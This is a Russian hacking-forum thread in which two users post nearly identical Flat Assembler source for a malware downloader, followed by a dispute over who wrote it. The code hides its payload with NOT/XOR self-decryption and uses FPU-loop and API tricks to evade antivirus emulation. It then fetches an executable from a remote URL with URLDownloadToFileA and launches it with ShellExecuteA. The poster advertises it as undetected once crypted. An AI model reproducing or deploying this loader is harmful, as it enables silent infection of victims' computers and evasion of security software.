Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
  , 03:55   #1
велопедрист
 
Аватар для i368
 
Локация: Там где велодорожки
Регистрация: 08.03.2013
Сообщений: 293

Репутация: 106 / 2
По умолчанию Downloader | Flat Assembler

Переделанный лоадырь не так сильно палится антивирами)
Криптуем и получаем true лоадер! ни один antivir не видит по результатам VT r3hab crypt3r
Assembler highlight

include 'win32ax.inc'
section '.code' code readable writeable executable
start:
push    esp
push    PAGE_EXECUTE_READWRITE
mov     eax, CodeEnd
sub     eax, MyCode
push    eax
push    MyCode
call    [VirtualProtect]

push    0
push    0
push    0
call    [OpenProcess]
call    [GetLastError]
test    al, al
je      MyCode
add     eax, 0Dh
sub     byte [Change], al
sub     eax, 0Dh

Change: db      0FFh
finit
push    eax
fild    dword [esp]
mov     ecx, 20000000
SQRT:
wait
fsqrt
dec     ecx
jnz     SQRT
fist    dword [esp]
pop     eax
add     eax, 56h
test    al, al
je      MyCode
mov     ecx, MyCode
decrypt:
mov     dl, byte [ecx]
not     dl
xor     dl, al
mov     byte [ecx], dl
inc     ecx
cmp     ecx, [CodeEnd]
jl      decrypt
jmp     MyCode
section '.bss' data readable writeable
MyCode:
jmp     Loader
urlmon  db 'urlmon.dll',0
_UrlDownloadToFile db 'URLDownloadToFileA',0
url               db 'http://site.ru/file.exe',0
SaveName          db 'backed.exe',0
Loader:
push    _UrlDownloadToFile
push    urlmon
call    _LoadLibraryA
mov     ebx, eax
push    eax
call    _GetProcAddress
mov     edi, eax
push    PAGE_READWRITE
push    MEM_COMMIT
push    270
push    0
call    _VirtualAlloc
mov     esi, eax
push    eax
push    256
call    _GetTempPath
push    SaveName
push    esi
call    _lstrcat
push    0
push    0
push    esi
push    url
push    0
call    edi
push    ebx
call    _FreeLibrary
push    SW_SHOW
push    0
push    0
push    esi
lea     eax, [esi + 256]
mov     dword [eax], 'open'
mov     byte [eax + 4], 0
push    eax
push    0
call    _ShellExecuteA
push    0
call    _ExitProcess
CodeEnd dd $
repeat CodeEnd-MyCode
load a byte from MyCode+%-1
store byte not a xor 57h at MyCode+%-1
end repeat
_LoadLibraryA:   jmp    [LoadLibraryA]
_GetProcAddress: jmp    [GetProcAddress]
_ShellExecuteA:  jmp    [ShellExecuteA]
_VirtualAlloc:   jmp    [VirtualAlloc]
_GetTempPath:    jmp    [GetTempPathA]
_lstrcat:        jmp    [lstrcatA]
_ExitProcess:    jmp    [ExitProcess]
_FreeLibrary:    jmp    [FreeLibrary]
.end start
crypt3r
сорец лоадера.asm
__________________
скучно - пиши код.

Последний раз редактировалось i368; 09.01.2015 в 04:27.
Пользователь вне форума    
Наши Спонсоры
  , 13:30   #2
Новичок
 
Регистрация: 07.08.2013
Сообщений: 15

Репутация: 7 / 0
По умолчанию

Цитата:
Переделанный лоадырь
Хм, что именно переделал? FPU заюзал?

Оригинал: http://wasm.ru/forum/viewtopic.php?pid=552636#p552636


code:
include 'win32ax.inc'

section '.code' code readable executable

start:
push	0
push	0
push	0
call	[OpenProcess]
call	[GetLastError]
test	al, al
je	MyCode

mov ecx, MyCode
decrypt:
mov dl, byte [ecx]
not dl
xor dl, al
mov byte [ecx], dl
inc ecx
cmp ecx, [CodeEnd]
jl decrypt

jmp	MyCode

section '.bss' data readable executable writeable
MyCode:
jmp	Loader
urlmon	db 'urlmon.dll',0
_UrlDownloadToFile db 'URLDownloadToFileA',0
url		  db 'http://site.ru/file.exe',0
SaveName	  db 'backed.exe',0
Loader:
push	_UrlDownloadToFile
push	urlmon
call	_LoadLibraryA
mov	ebx, eax
push	eax
call	_GetProcAddress
mov	edi, eax

push	PAGE_READWRITE
push	MEM_COMMIT
push	270
push	0
call	_VirtualAlloc
mov	esi, eax
push	eax
push	256
call	_GetTempPath
push	SaveName
push	esi
call	_lstrcat


push	0
push	0
push	esi
push	url
push	0
call	edi

push	ebx
call	_FreeLibrary



push	SW_SHOW
push	0
push	0
push	esi
lea	eax, [esi + 256]
mov	dword [eax], 'open'
mov	byte [eax + 4], 0
push	eax
push	0
call	_ShellExecuteA


push	0
call	_ExitProcess






CodeEnd dd $

repeat CodeEnd-MyCode
load a byte from MyCode+%-1
store byte not a xor 57h at MyCode+%-1
end repeat


_LoadLibraryA:	 jmp	[LoadLibraryA]
_GetProcAddress: jmp	[GetProcAddress]
_ShellExecuteA:  jmp	[ShellExecuteA]
_VirtualAlloc:	 jmp	[VirtualAlloc]
_GetTempPath:	 jmp	[GetTempPathA]
_lstrcat:	 jmp	[lstrcatA]
_ExitProcess:	 jmp	[ExitProcess]
_FreeLibrary:	 jmp	[FreeLibrary]

.end start
 

Последний раз редактировалось Nu11ers3t; 09.01.2015 в 13:32.
Пользователь вне форума    
  , 13:41   #3
Новичок
 
Регистрация: 07.08.2013
Сообщений: 15

Репутация: 7 / 0
По умолчанию

UPD:

Автор тупо скопипастил отсюда:

https://fuckav.ru/showthread.php?t=19738

Оказывается, это вообще мой код ( IBM - это я, смотрите под авой жабу: [email protected], как пруф ).

Просьба поставить авторство и ссылку на оригинал.

P.S. Если все-таки где-то что-то изменил пару строчек, прошу извинить меня и указать где именно.
 
Пользователь вне форума    
  , 14:49   #4
велопедрист
 
Аватар для i368
 
Локация: Там где велодорожки
Регистрация: 08.03.2013
Сообщений: 293

Репутация: 106 / 2
По умолчанию

Цитата:
Сообщение от Nu11ers3t Посмотреть сообщение
UPD:

Автор тупо скопипастил отсюда:

https://fuckav.ru/showthread.php?t=19738

Оказывается, это вообще мой код ( IBM - это я, смотрите под авой жабу: [email protected], как пруф ).

Просьба поставить авторство и ссылку на оригинал.

P.S. Если все-таки где-то что-то изменил пару строчек, прошу извинить меня и указать где именно.
Странно,интересно как "твой код" оказался у меня на hdd да и ещё с датой создание 2013? + там не написано точный твой адрес, ссылки на wasm и fackav с этой темой, и другие форуме где лежит сорец:с
__________________
скучно - пиши код.

Последний раз редактировалось i368; 09.01.2015 в 15:07.
Пользователь вне форума    
  , 23:44   #5
Новичок
 
Регистрация: 07.08.2013
Сообщений: 15

Репутация: 7 / 0
По умолчанию

Цитата:
Сообщение от i368 Посмотреть сообщение
Странно,интересно как "твой код" оказался у меня на hdd да и ещё с датой создание 2013? + там не написано точный твой адрес, ссылки на wasm и fackav с этой темой, и другие форуме где лежит сорец:с
2013, серьезно? Может дата была сбита, код то мой и писал его в сентябре 2014. Мб есть отличия, но при просмотре не обнаруживаются.

P.S. Ссылку же выше привел:

https://fuckav.ru/showthread.php?t=19738

P.P.S. Приводи тоже ссылки, если где выкладывал. Если нигде не выкладывал, а он тупо лежал на харде с 2013 года, то напрашивается два варианта: либо пипец какое совпадение ( что вряд ли ), либо копипаст.

Цитата:
там не написано точный твой адрес
В смысле?

UPD:

Забил кусок кода в гугле. Почему fuckav`у не выдает, хз. Теперь с тебя ссылки.

IMAGE http://savepic.ru/6581324.jpg
 

Последний раз редактировалось Nu11ers3t; 09.01.2015 в 23:48.
Пользователь вне форума    
  , 23:50   #6
велопедрист
 
Аватар для i368
 
Локация: Там где велодорожки
Регистрация: 08.03.2013
Сообщений: 293

Репутация: 106 / 2
По умолчанию

Цитата:
Сообщение от Nu11ers3t Посмотреть сообщение
2013, серьезно? Может дата была сбита, код то мой и писал его в сентябре 2014. Мб есть отличия, но при просмотре не обнаруживаются.

P.S. Ссылку же выше привел:

https://fuckav.ru/showthread.php?t=19738

P.P.S. Приводи тоже ссылки, если где выкладывал. Если нигде не выкладывал, а он тупо лежал на харде с 2013 года, то напрашивается два варианта: либо пипец какое совпадение ( что вряд ли ), либо копипаст.



В смысле?

UPD:

Забил кусок кода в гугле. Почему fuckav`у не выдает, хз. Теперь с тебя ссылки.

IMAGE http://savepic.ru/6581324.jpg
hdd еще старый, там лежала папка "flat assembler_sources.zip" год 2013, мб совпадение, хз , не важно вообщем, не хочу спросить из-за мелочей
__________________
скучно - пиши код.
Пользователь вне форума    
  , 23:52   #7
Новичок
 
Регистрация: 07.08.2013
Сообщений: 15

Репутация: 7 / 0
По умолчанию

Цитата:
Сообщение от i368 Посмотреть сообщение
hdd еще старый, там лежала папка "flat assembler_sources.zip" год 2013, мб совпадение, хз , не важно вообщем, не хочу спросить из-за мелочей
Омг, странно. Мб дата создания, а не изменения? Тоже не хочу спорить, но стало уж очень интересно.
 
Пользователь вне форума    
  , 23:58   #8
велопедрист
 
Аватар для i368
 
Локация: Там где велодорожки
Регистрация: 08.03.2013
Сообщений: 293

Репутация: 106 / 2
По умолчанию

Цитата:
Сообщение от Nu11ers3t Посмотреть сообщение
Омг, странно. Мб дата создания, а не изменения? Тоже не хочу спорить, но стало уж очень интересно.
Заходи в чат там пообщаемся
__________________
скучно - пиши код.
Пользователь вне форума    
  , 08:50   #9
Новичок
 
Локация: http://scanner.fuckav.ru/
Регистрация: 30.10.2010
Сообщений: 20

Репутация: 4 / 0
По умолчанию

Nu11ers3t, а у мну все гуглится =)
Безымянный.png
 
Пользователь вне форума    
 

Метки
downloader, flat assembler

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Удаление файла | Flat Assembler i368 Assembler 2 09.01.2015 14:38
Подборка книг по Assembler LEMon[ua] Assembler 3 09.10.2013 17:55



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.